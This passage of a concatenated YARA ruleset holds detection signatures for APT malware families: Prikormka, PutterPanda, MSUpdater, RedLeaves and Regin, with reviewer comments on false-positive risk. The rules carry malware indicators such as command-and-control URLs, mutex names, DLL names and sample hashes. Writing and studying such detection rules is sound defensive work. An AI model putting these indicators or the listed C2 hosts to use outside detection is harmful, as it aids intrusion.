        $str3 = {00 6B 6C 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00}                          // "\0kl.dll\0Starting\0"
        $str4 = {69 6F 6D 75 73 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67}                       // "iomus.dll\0Starting"
        $str5 = {61 74 69 6D 6C 2E 64 6C 6C 00 4B 69 63 6B 49 6E 50 6F 69 6E 74}              // "atiml.dll\0KickInPoint"
        $str6 = {73 6E 6D 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64}        // "snm.dll\0GetReadyForDead"
        $str7 = {73 63 72 73 68 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64}  // "scrsh.dll\0GetReadyForDead"
        // encrypted
        $str8 = {50 52 55 5C 17 51 58 17 5E 4A}
        $str9 = {60 4A 55 55 4E 53 58 4B 17 52 57 17 5E 4A}
        $str10 = {55 52 5D 4E 5B 4A 5D 17 51 58 17 5E 4A}
        $str11 = {60 4A 55 55 4E 61 17 51 58 17 5E 4A}
        $str12 = {39 5D 17 1D 1C 0A 3C 57 59 3B 1C 1E 57 58 4C 54 0F}
        // mutex
        $str13 = "ZxWinDeffContex" ascii wide
        $str14 = "Paramore756Contex43" wide
        $str15 = "Zw_&one@ldrContext43" wide
        // other
        $str16 = "A95BL765MNG2GPRS"
        // dll names
        $str17 = "helpldr.dll" wide fullword
        $str18 = "swma.dll" wide fullword
        $str19 = "iomus.dll" wide fullword
        $str20 = "atiml.dll" wide fullword
        $str21 = "hlpuctf.dll" wide fullword
        $str22 = "hauthuid.dll" ascii wide fullword
        // rbcon
        $str23 = "[roboconid][%s]" ascii fullword
        $str24 = "[objectset][%s]" ascii fullword
        $str25 = "rbcon.ini" wide fullword
        // files and logs
        $str26 = "%s%02d.%02d.%02d_%02d.%02d.%02d.skw" ascii fullword
        $str27 = "%02d.%02d.%02d_%02d.%02d.%02d.%02d.rem" wide fullword
        // pdb strings
        $str28 = ":\\!PROJECTS!\\Mina\\2015\\" ascii
        $str29 = "\\PZZ\\RMO\\" ascii
        $str30 = ":\\work\\PZZ" ascii
        $str31 = "C:\\Users\\mlk\\" ascii
        $str32 = ":\\W o r k S p a c e\\" ascii
        $str33 = "D:\\My\\Projects_All\\2015\\" ascii
        $str34 = "\\TOOLS PZZ\\Bezzahod\\" ascii
    condition:
        ($mz at 0) and (any of ($str*))
}
rule PrikormkaEarlyVersion
{
    // Early Prikormka builds: an MZ header plus any two of the $str* strings.
    // NOTE(review): $str37 ("Resent", wide, fullword) is an ordinary English
    // word and is the weakest member of this set; paired with one other hit
    // it already satisfies the 2-of threshold, so review matches that depend
    // on it.
    strings:
        $mz = { 4D 5A }
        $str36 = "IntelRestore" ascii fullword
        $str37 = "Resent" wide fullword
        $str38 = "ocp8.1" wide fullword
        $str39 = "rsfvxd.dat" ascii fullword
        $str40 = "tsb386.dat" ascii fullword
        $str41 = "frmmlg.dat" ascii fullword
        $str42 = "smdhost.dll" ascii fullword
        $str43 = "KDLLCFX" wide fullword
        $str44 = "KDLLRUNDRV" wide fullword
    condition:
        ($mz at 0) and (2 of ($str*))
}
rule Prikormka
{
    // Aggregate rule: matches when any of the three Prikormka rules above
    // matches. YARA resolves rule references against rules declared earlier
    // in the ruleset, so the ordering above is load-bearing.
    meta:
        Author = "Anton Cherepanov"
        Date = "2016/05/10"
        Description = "Operation Groundbait"
        Source = "https://github.com/eset/malware-ioc/"
        Contact = "threatintel@eset.com"
        License = "BSD 2-Clause"
    condition:
        PrikormkaDropper or PrikormkaModule or PrikormkaEarlyVersion
}
/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */
rule APT_Malware_PutterPanda_Rel
{
    meta:
        description = "Detects an APT malware related to PutterPanda"
        author = "Florian Roth"
        score = 70
        reference = "VT Analysis"
        date = "2015-06-03"
        hash = "5367e183df155e3133d916f7080ef973f7741d34"
    strings:
        $x0 = "app.stream-media.net" fullword ascii /* score: '12.03' */
        $x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.035' */
        $s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '32.02' */
        $s7 = "Connect %s error!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.04' */
        $s9 = "Download file %s successfully!"
fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.03' */ $s10 = "index.tmp" fullword ascii /* score: '14.03' */ $s11 = "Execute PE Successfully" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.03' */ $s13 = "aa/22/success.xml" fullword ascii /* score: '12.005' */ $s16 = "aa/22/index.asp" fullword ascii /* score: '11.02' */ $s18 = "File %s a Non-Pe File" fullword ascii /* score: '8.04' */ $s19 = "SendRequset error!" fullword ascii /* score: '8.04' */ $s20 = "filelist[%d]=%s" fullword ascii /* score: '7.015' */ condition: ( uint16(0) == 0x5a4d and 1 of ($x*) ) or ( 4 of ($s*) ) } rule APT_Malware_PutterPanda_Rel_2 { meta: description = "APT Malware related to PutterPanda Group" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381" strings: $s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.01' */ $s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" 
fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.01' */ $s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii /* PEStudio Blacklist: agent */ /* score: '20.03' */ $s3 = "Internet connect error:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.035' */ $s4 = "Proxy-Authorization:Basic" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.02' */ $s5 = "HttpQueryInfo failed:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.015' */ $s6 = "read file error:%d" fullword ascii /* score: '11.04' */ $s7 = "downdll.dll" fullword ascii /* score: '11.025' */ $s8 = "rz.dat" fullword ascii /* score: '10.005' */ $s9 = "Invalid url" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.03' */ $s10 = "Create file failed" fullword ascii /* score: '8.045' */ $s11 = "myAgent" fullword ascii /* score: '8.025' */ $s12 = "%s%s%d%d" fullword ascii /* score: '8.005' */ $s13 = "down file success" fullword ascii /* score: '7.035' */ $s15 = "error!" 
fullword ascii /* score: '6.04' */
        $s18 = "Avaliable data:%u bytes" fullword ascii /* score: '5.025' */
    condition:
        uint16(0) == 0x5a4d and 6 of them
}
rule APT_Malware_PutterPanda_PSAPI
{
    // NOTE(review): $s0 and $s1 read like generic loader-stub error messages
    // (the kind emitted by common executable packers) rather than text that is
    // specific to this malware, and $s2-$s4 are annotated below as frequent
    // goodware strings. The rule therefore keys mostly on "a PE under 300KB
    // whose stub references psapi/urlmon/WinHTTP"; verify its false-positive
    // rate on a goodware corpus before using it for anything beyond triage.
    meta:
        description = "Detects a malware related to Putter Panda"
        author = "Florian Roth"
        score = 70
        reference = "VT Analysis"
        date = "2015-06-03"
        hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
    strings:
        $s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */ /* score: '12.03' */
        $s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '8.045' */
        $s2 = "psapi.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 54 times */
        $s3 = "urlmon.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 471 times */
        $s4 = "WinHttpGetProxyForUrl" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 179 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
rule APT_Malware_PutterPanda_WUAUCLT
{
    meta:
        description = "Detects a malware related to Putter Panda"
        author = "Florian Roth"
        score = 70
        reference = "VT Analysis"
        date = "2015-06-03"
        hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
    strings:
        $x0 = "WUAUCLT.EXE" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */
        $x1 = "%s\\tmp%d.exe" fullword ascii /* score: '14.01' */
        $x2 = "Microsoft Corporation. All rights reserved."
fullword wide /* score: '8.04' */ $s1 = "Microsoft Windows Operating System" fullword wide /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 4 times */ $s2 = "InternetQueryOptionA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 166 times */ $s3 = "LookupPrivilegeValueA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 336 times */ $s4 = "WNetEnumResourceA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 29 times */ $s5 = "HttpSendRequestExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 87 times */ $s6 = "PSAPI.DLL" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 420 times */ $s7 = "Microsoft(R) Windows(R) Operating System" fullword wide /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 128 times */ $s8 = "CreatePipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 222 times */ $s9 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5' */ /* Goodware String - occured 410 times */ condition: all of ($x*) or (1 of ($x*) and all of ($s*) ) } rule APT_Malware_PutterPanda_Gen1 { meta: description = "Detects a malware " author = "YarGen Rule Generator" reference = "not set" date = "2015-06-03" super_rule = 1 hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a" hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796" hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad" strings: $s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '22.02' */ $s2 = "ssdpsvc.dll" fullword ascii /* score: '11.00' */ $s3 = "Fail %s " fullword ascii /* score: '10.04' */ $s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii /* score: '10.01' */ $s5 = "LsaServiceInit" fullword ascii /* score: 
'7.03' */
        $s6 = "%-8d Fs %-12s Bs " fullword ascii /* score: '5.04' */
        $s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii /* PEStudio Blacklist: strings */ /* score: '5.00' */ /* Goodware String - occured 5 times */
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them
}
rule Malware_MsUpdater_String_in_EXE
{
    // Low-confidence indicator (score 50): a PE under 500KB carrying one of
    // the msupdate* file names and none of the known false-positive markers
    // ($fp*).
    // NOTE(review): the disabled $x2 below is a "//" line comment; it must
    // stay on a line of its own. If this file is collapsed onto one line, the
    // comment swallows $x3-$fp3, the condition and the rules that follow.
    meta:
        description = "MSUpdater String in Executable"
        author = "Florian Roth"
        score = 50
        reference = "VT Analysis"
        date = "2015-06-03"
        hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
    strings:
        $x1 = "msupdate.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */
        // $x2 = "msupdate" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.01' */
        $x3 = "msupdater.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '20.02' */
        $x4 = "msupdater32.exe" fullword ascii
        $x5 = "msupdater32.exe" fullword wide
        $x6 = "msupdate.pif" fullword ascii
        $fp1 = "_msupdate_" wide /* False Positive */
        $fp2 = "_msupdate_" ascii /* False Positive */
        $fp3 = "/kies" wide
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and ( 1 of ($x*) ) and not ( 1 of ($fp*) )
}
rule APT_Malware_PutterPanda_MsUpdater_3
{
    // $s4 ("COMSPEC") is annotated as a common goodware string, so `3 of them`
    // in practice means two of $s0-$s2 plus COMSPEC, or all three of $s0-$s2.
    meta:
        description = "Detects Malware related to PutterPanda - MSUpdater"
        author = "Florian Roth"
        score = 70
        reference = "VT Analysis"
        date = "2015-06-03"
        hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
    strings:
        $s0 = "msupdater.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '20.02' */
        $s1 = "Explorer.exe \"" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.05' */
        $s2 = "FAVORITES.DAT" fullword ascii /* score: '11.02' */
        $s4 = "COMSPEC" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.82' */ /* Goodware String - occured 178 times */
    condition:
        uint16(0) == 0x5a4d and 3 of them
}
rule APT_Malware_PutterPanda_MsUpdater_1
{
    meta:
        description = "Detects Malware related to PutterPanda - MSUpdater"
        author = "Florian Roth"
        score = 70
        reference = "VT Analysis"
        date = "2015-06-03"
hash = "b55072b67543f58c096571c841a560c53d72f01a" strings: $x0 = "msupdate.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.01' */ $x1 = "msupdate" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.01' */ $s1 = "Microsoft Corporation. All rights reserved." fullword wide /* score: '8.04' */ $s2 = "Automatic Updates" fullword wide /* PEStudio Blacklist: strings */ /* score: '4.98' */ /* Goodware String - occured 22 times */ $s3 = "VirtualProtectEx" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.93' */ /* Goodware String - occured 68 times */ $s4 = "Invalid parameter" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.93' */ /* Goodware String - occured 69 times */ $s5 = "VirtualAllocEx" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 95 times */ $s6 = "WriteProcessMemory" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.87' */ /* Goodware String - occured 131 times */ condition: ( uint16(0) == 0x5a4d and 1 of ($x*) and 4 of ($s*) ) or ( 1 of ($x*) and all of ($s*) ) } rule APT_Malware_PutterPanda_MsUpdater_2 { meta: description = "Detects Malware related to PutterPanda - MSUpdater" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" hash = "365b5537e3495f8ecfabe2597399b1f1226879b1" strings: $s0 = "winsta0\\default" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.99' */ /* Goodware String - occured 6 times */ $s1 = "EXPLORER.EXE" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.98' */ /* Goodware String - occured 22 times */ $s2 = "WNetEnumResourceA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.97' */ /* Goodware String - occured 29 times */ $s3 = "explorer.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.97' */ /* Goodware String - occured 31 times */ $s4 = "CreateProcessAsUserA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware 
String - occured 86 times */ $s5 = "HttpSendRequestExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 87 times */ $s6 = "HttpEndRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.91' */ /* Goodware String - occured 91 times */ $s7 = "GetModuleBaseNameA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.88' */ /* Goodware String - occured 121 times */ $s8 = "GetModuleFileNameExA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.86' */ /* Goodware String - occured 144 times */ $s9 = "HttpSendRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.85' */ /* Goodware String - occured 154 times */ $s10 = "HttpOpenRequestA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.84' */ /* Goodware String - occured 159 times */ $s11 = "InternetConnectA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.82' */ /* Goodware String - occured 183 times */ $s12 = "Process32Next" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.80' */ /* Goodware String - occured 204 times */ $s13 = "Process32First" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.79' */ /* Goodware String - occured 210 times */ $s14 = "CreatePipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.78' */ /* Goodware String - occured 222 times */ $s15 = "EnumProcesses" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.73' */ /* Goodware String - occured 273 times */ $s16 = "LookupPrivilegeValueA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.66' */ /* Goodware String - occured 336 times */ $s17 = "PeekNamedPipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.65' */ /* Goodware String - occured 347 times */ $s18 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.59' */ /* Goodware String - occured 410 times */ $s19 = "PSAPI.DLL" fullword ascii /* PEStudio Blacklist: 
strings */ /* score: '4.58' */ /* Goodware String - occured 420 times */ $s20 = "SPSSSQ" fullword ascii /* score: '4.51' */ condition: uint16(0) == 0x5a4d and filesize < 220KB and all of them } rule APT_Malware_PutterPanda_Gen4 { meta: description = "Detects Malware related to PutterPanda" author = "Florian Roth" score = 70 reference = "VT Analysis" date = "2015-06-03" super_rule = 1 hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c" hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552" hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0" hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e" hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689" strings: $x1 = "rz.dat" fullword ascii /* score: '10.00' */ $s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii /* PEStudio Blacklist: agent */ /* score: '20.03' */ $s1 = "Internet connect error:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.04' */ $s2 = "Proxy-Authorization:Basic " fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.02' */ $s5 = "Invalid url" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.03' */ $s6 = "Create file failed" fullword ascii /* score: '8.04' */ $s7 = "myAgent" fullword ascii /* score: '8.03' */ $z1 = "%s%s%d%d" fullword ascii /* score: '8.00' */ $z2 = "HttpQueryInfo failed:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.02' */ $z3 = "read file error:%d" fullword ascii /* score: '11.04' */ $z4 = "down file success" fullword ascii /* score: '7.04' */ $z5 = "kPStoreCreateInstance" fullword ascii /* score: '5.03' */ $z6 = "Avaliable data:%u bytes" fullword ascii /* score: '5.03' */ $z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii /* PEStudio Blacklist: guid */ /* score: '5.00' */ /* Goodware String - occured 2 times */ condition: filesize < 300KB and (( uint16(0) == 0x5a4d and $x1 and 3 of ($s*) ) or ( 3 of ($s*) and 4 of ($z*) )) } rule malware_red_leaves_generic { meta: author = "David Cannings" description = "Red Leaves 
malware, related to APT10"
        // This hash from VT retrohunt, original sample was a memory dump
        // NOTE(review): the "//" comment above must stay on its own line; if
        // this file is collapsed onto one line it swallows the sha256 entry,
        // the strings section and the condition that follow.
        sha256 = "2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c"
    strings:
        // MiniLZO release date
        $ = "Feb 04 2015"
        $ = "I can not start %s"
        $ = "dwConnectPort" fullword
        $ = "dwRemoteLanPort" fullword
        $ = "strRemoteLanAddress" fullword
        $ = "strLocalConnectIp" fullword
        $ = "\\\\.\\pipe\\NamePipe_MoreWindows" wide
        $ = "RedLeavesCMDSimulatorMutex" wide
        $ = "(NT %d.%d Build %d)" wide
        $ = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide
        $ = "red_autumnal_leaves_dllmain.dll" wide ascii
        $ = "__data" wide
        $ = "__serial" wide
        $ = "__upt" wide
        $ = "__msgid" wide
    condition:
        // Anonymous strings: 7 of the 15 above, with no PE/MZ anchor (the
        // reference sample was a memory dump).
        7 of them
}
rule malware_red_leaves_memory
{
    // Memory-scan companion for the RedLeaves C&C strings. Meant for process
    // memory (Volatility / Rekall), so there is deliberately no MZ anchor and
    // the threshold is 3 of the 5 short "key=" tokens.
    // NOTE(review): "clientpath=", "serverpath=" and "OnlineTime=" are
    // plausible in unrelated software; treat a hit that includes neither
    // "__msgid=" nor "__serial=" as lower confidence.
    meta:
        author = "David Cannings"
        description = "Red Leaves C&C left in memory, use with Volatility / Rekall"
    strings:
        $ = "__msgid=" wide ascii
        $ = "__serial=" wide ascii
        $ = "OnlineTime=" wide
        // Indicates a file transfer
        $ = "clientpath=" wide ascii
        $ = "serverpath=" wide ascii
    condition:
        3 of them
}
/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
Warning: Don't use this rule set without excluding the false positive hashes listed in the file falsepositive-hashes.txt from https://github.com/Neo23x0/Loki/blob/master/signatures/falsepositive-hashes.txt */

// "pe" is imported by this concatenated rule set as a whole; none of the Regin
// or Remsec rules in this section reference pe.* fields.
import "pe"

/*
 * Regin kernel driver, generic variant A. Anchors on a fixed 17-byte MZ header
 * prefix at offset 0 plus the DOS-stub text, then requires every $s* string and
 * one of the two $x* markers. $s6-$s8 ("system", "temp", "windows") are generic
 * on their own; the header bytes and $x* carry the specificity.
 */
rule Regin_APT_KernelDriver_Generic_A
{
    meta:
        description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
        author = "@Malwrsignatures - included in APT Scanner THOR"
        date = "23.11.14"
        hash1 = "187044596bc1328efa0ed636d8aa4a5c"
        hash2 = "06665b96e293b23acc80451abb413e50"
        hash3 = "d240f06e98c8d3e647cbf4d442d79475"

    strings:
        // First 17 bytes of the MZ header as seen in the listed samples.
        $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
        // DOS stub code followed by "This program cannot be run in DOS mode."
        $m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
        $s0 = "atapi.sys" fullword wide
        $s1 = "disk.sys" fullword wide
        $s3 = "h.data" fullword ascii
        $s4 = "\\system32" fullword ascii
        $s5 = "\\SystemRoot" fullword ascii
        $s6 = "system" fullword ascii
        $s7 = "temp" fullword ascii
        $s8 = "windows" fullword ascii
        $x1 = "LRich6" fullword ascii
        $x2 = "KeServiceDescriptorTable" fullword ascii

    condition:
        $m0 at 0 and $m1 and all of ($s*) and 1 of ($x*)
}

/*
 * Regin kernel driver, generic variant B. Same MZ prefix at offset 0, the DOS
 * stub ($s1) and three section/import names are mandatory; then any ONE of the
 * five import groups $v*..$z* must be complete. $v1/$v2 and $w1/$w2 are the
 * same two paths, so the v/w groups differ only in their third string.
 * Size capped at 20KB.
 */
rule Regin_APT_KernelDriver_Generic_B
{
    meta:
        description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
        author = "@Malwrsignatures - included in APT Scanner THOR"
        date = "23.11.14"
        hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
        hash2 = "bfbe8c3ee78750c3a520480700e440f8"
        hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
        hash4 = "06665b96e293b23acc80451abb413e50"
        hash5 = "2c8b9d2885543d7ade3cae98225e263b"
        hash6 = "4b6b86c7fec1c574706cecedf44abded"
        hash7 = "187044596bc1328efa0ed636d8aa4a5c"
        hash8 = "d240f06e98c8d3e647cbf4d442d79475"
        hash9 = "6662c390b2bbbd291ec7987388fc75d7"
        hash10 = "1c024e599ac055312a4ab75b3950040a"
        hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
        hash12 = "b505d65721bb2453d5039a389113b566"
        hash13 = "b269894f434657db2b15949641a67532"

    strings:
        $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
        // DOS stub: "This program cannot be run in DOS mode."
        $s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
        $s2 = "H.data" fullword ascii nocase
        $s3 = "INIT" fullword ascii
        $s4 = "ntoskrnl.exe" fullword ascii

        // Import / path groups - one complete group is enough.
        $v1 = "\\system32" fullword ascii
        $v2 = "\\SystemRoot" fullword ascii
        $v3 = "KeServiceDescriptorTable" fullword ascii
        $w1 = "\\system32" fullword ascii
        $w2 = "\\SystemRoot" fullword ascii
        $w3 = "LRich6" fullword ascii
        $x1 = "_snprintf" fullword ascii
        $x2 = "_except_handler3" fullword ascii
        $y1 = "mbstowcs" fullword ascii
        $y2 = "wcstombs" fullword ascii
        $y3 = "KeGetCurrentIrql" fullword ascii
        $z1 = "wcscpy" fullword ascii
        $z2 = "ZwCreateFile" fullword ascii
        $z3 = "ZwQueryInformationFile" fullword ascii
        $z4 = "wcslen" fullword ascii
        $z5 = "atoi" fullword ascii

    condition:
        $m0 at 0
        and all of ($s*)
        and (
            all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*)
        )
        and filesize < 20KB
}

/*
 * Regin kernel driver, generic variant C: a small (<20KB) driver posing as a USB
 * class driver or LSA component. MZ prefix at 0, the three $s* strings, and
 * either the full USB-driver version block ($x*) or the LSA pair ($y*).
 */
rule Regin_APT_KernelDriver_Generic_C
{
    meta:
        description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
        author = "@Malwrsignatures - included in APT Scanner THOR"
        date = "23.11.14"
        hash1 = "e0895336617e0b45b312383814ec6783556d7635"
        hash2 = "732298fa025ed48179a3a2555b45be96f7079712"

    strings:
        $m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
        $s0 = "KeGetCurrentIrql" fullword ascii
        $s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
        $s2 = "usbclass" fullword wide
        // Linker padding text; generic by itself, only meaningful with $x2/$x3.
        $x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
        $x2 = "Universal Serial Bus Class Driver" fullword wide
        $x3 = "5.2.3790.0" fullword wide
        $y1 = "LSA Shell" fullword wide
        $y2 = "0Richw" fullword ascii

    condition:
        $m0 at 0 and all of ($s*) and ( all of ($x*) or all of ($y*) ) and filesize < 20KB
}

/* Update 27.11.14 */

/*
 * Regin svcsstat.exe service component, pinned by size (10-15KB) and seven
 * strings that must all be present.
 * NOTE(review): "Root Agency" looks like the subject name of a test-signing root
 * certificate - presumably the sample was test-signed; confirm before relying on
 * it as a discriminator.
 */
rule Regin_sig_svcsstat
{
    meta:
        description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
        author = "@MalwrSignatures"
        date = "26.11.14"
        hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"

    strings:
        $s0 = "Service Control Manager" fullword ascii
        $s1 = "_vsnwprintf" fullword ascii
        $s2 = "Root Agency" fullword ascii
        $s3 = "Root Agency0" fullword ascii
        $s4 = "StartServiceCtrlDispatcherA" fullword ascii
        $s5 = "\\\\?\\UNC" fullword wide
        $s6 = "%ls%ls" fullword wide

    condition:
        all of them and filesize < 15KB and filesize > 10KB
}

/*
 * Auto-generated rule for a Regin driver sample. All sixteen strings plus an
 * 80-110KB size window are required.
 * NOTE(review): every string is a serial-port driver debug message
 * (SerialAddDevice, SerialGetPortInfo, userPortIndex ...). A legitimately
 * built serial driver of this size could carry the same text - check hits
 * against falsepositive-hashes.txt and treat this as a lead, not a verdict.
 */
rule Regin_Sample_1
{
    meta:
        description = "Auto-generated rule - file-3665415_sys"
        author = "@MalwrSignatures"
        date = "26.11.14"
        hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"

    strings:
        $s0 = "Getting PortName/Identifier failed - %x" fullword ascii
        $s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
        $s2 = "External Naming Failed - Status %x" fullword ascii
        $s3 = "------- Same multiport - different interrupts" fullword ascii
        $s4 = "%x occurred prior to the wait - starting the" fullword ascii
        $s5 = "'user registry info - userPortIndex: %d" fullword ascii
        $s6 = "Could not report legacy device - %x" fullword ascii
        $s7 = "entering SerialGetPortInfo" fullword ascii
        $s8 = "'user registry info - userPort: %x" fullword ascii
        // Trailing space inside the quotes is part of the pattern.
        $s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
        $s10 = "Kernel debugger is using port at address %X" fullword ascii
        $s12 = "Release - freeing multi context" fullword ascii
        $s13 = "Serial driver will not load port" fullword ascii
        $s14 = "'user registry info - userAddressSpace: %d" fullword ascii
        $s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
        $s20 = "'user registry info - userIndexed: %d" fullword ascii

    condition:
        all of them and filesize < 110KB and filesize > 80KB
}

/*
 * Auto-generated rule for a Regin disk-hooking kernel module (30-40KB).
 * Mostly kernel import names; the lsass.exe path ($s0) and the two driver
 * names ($s1/$s2) are the only non-generic strings, and all are required.
 */
rule Regin_Sample_2
{
    meta:
